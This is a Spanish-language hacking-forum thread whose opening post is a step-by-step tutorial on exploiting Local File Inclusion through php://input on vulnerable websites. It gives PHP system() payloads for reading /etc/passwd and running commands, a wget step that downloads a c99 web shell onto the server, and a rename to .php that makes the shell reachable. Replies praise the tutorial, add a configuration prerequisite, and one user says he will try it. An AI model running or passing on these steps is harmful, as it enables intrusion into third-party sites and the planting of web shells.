comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Subiendo Shell Explotando LFI via PHP:INPUT

  • 10 Respuestas
  • 6491 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« en: Julio 14, 2012, 11:53:18 pm »

Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI?

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar


Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría asi:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:


Otros comandos:

Lista de directorios
<? system ('ls'); ?>

Identificación
<? system ('id'); ?>

Convertir el formato
<? system ('mv file.txt file.php'); ?>

Descargar
<? system ('wget'); ?>


Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: No tienes permisos para ver links. Registrate o Entra con tu cuenta

<? system ('wget No tienes permisos para ver links. Registrate o Entra con tu cuenta ?>



Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>



Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php


Ahora, en este caso nos dirigimos a No tienes permisos para ver links. Registrate o Entra con tu cuenta y Voila tenemos nuestra shell!!


No Entendistes?

Observa el VideoTutorial en 1080p HD!


Espero te sirva y lo uses con prudencia.

Saludos.
« Última modificación: Noviembre 23, 2014, 01:20:10 pm por Expermicid »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 549
  • Actividad:
    13.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Julio 15, 2012, 04:44:54 am »
Excelente tutorial :)

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 549
  • Actividad:
    13.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #2 en: Julio 15, 2012, 05:32:47 am »
Estuve probando con varias paginas vulnerables a lfi pero ninguna de ellas pude hacer el php://input :(
Aunque fueran por post me puse a mirar con el http live headers para ver si se enviaba por post correctamente y si! habia unas paginas que no me tiraban nada, otras que me tiraban un error de file stream open, es decir, que no se podia abrir un archivo en php xD!, tambien cuando no me salia nada me fije en el codigo ctrl+u para ver si estaba algo pero nada, a lo mejor es por que ya solucionaron este bug? bueno igual puede aver alguno igual me sirvio para aprender :D

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #3 en: Julio 15, 2012, 06:54:54 am »
Grande Caleb, buen tuto te montaste ;)
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #4 en: Julio 15, 2012, 07:22:09 am »
Pedazo de tutorial, me encanto  ;D

-Saludos-

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #5 en: Julio 15, 2012, 09:46:33 pm »
Exelente Aporte!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #6 en: Agosto 27, 2012, 08:31:06 pm »
Se te olvido decir que para utlizar el wrapper php://input las directivas allow_url_include y allow_url_fopen tienen que estar ON, por consiguiente dicho LFI se convertiria en un RFI, y seria al pedo ejecutar comando de esa manera puediendo incluir directamente una shell a travez de la url.

Buen post igual!  ;) 
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Mr_Pack

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • r00tc0d3rs
    • Email
« Respuesta #7 en: Agosto 31, 2012, 03:43:58 am »
Excelente Aporte  Caleb  ;)

salu2  ;D
____________________________

my best crime is myself

Desconectado BlackBox

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Septiembre 08, 2012, 01:08:30 am »
Muy bueno conocia el de Tamper Data injectar en el request la shell..

Te Hago una pregunta muchas veces he encontrado sitios a los cuales les hago esta inyeccion en un campo ejemplo:

download.php?id=/etc/passwd

Si y cuando hago esto me descarga el archivillo con toda la info a mi equipo, me confunde algo este tipo de inyeccion y no sabria si al inyectar la shell en ves de alojarla en el servidor me la descargue al equipo, no he vuelto a encontrar sitios asi como para probar con HackBar

Muchas Gracias por tus Buenos Aportes

Desconectado droxiscoder

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Septiembre 09, 2012, 01:20:18 pm »
excelente aporte muchas gracias

Desconectado DogBreaker

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
  • Skype! Dog.Breaker1
    • Ver Perfil
    • Email
« Respuesta #10 en: Noviembre 02, 2012, 11:18:52 am »
exelente ya lo voy a llevar a la practica!
El futuro pertenece a quienes creen en la belleza de sus sueños

 

¿Te gustó el post? COMPARTILO!



Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 3981
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
Subir Shell a través de Inyección SSI (Server-side include)

Iniciado por CalebBucker

Respuestas: 7
Vistas: 3723
Último mensaje Junio 23, 2012, 08:44:07 am
por s3cur1tyr00t
[VIDEO] Como subir una shell a Wordpress

Iniciado por unkdown

Respuestas: 2
Vistas: 2297
Último mensaje Diciembre 13, 2015, 07:12:12 pm
por Gabriela
[Video-Tutorial] Bypassing an uploader to get shell.

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1438
Último mensaje Julio 21, 2010, 07:38:59 pm
por Xt3mP
Subir Shell desde la Administración de un foro SMF

Iniciado por Rootscale

Respuestas: 2
Vistas: 3649
Último mensaje Junio 28, 2012, 12:00:20 am
por hdbreaker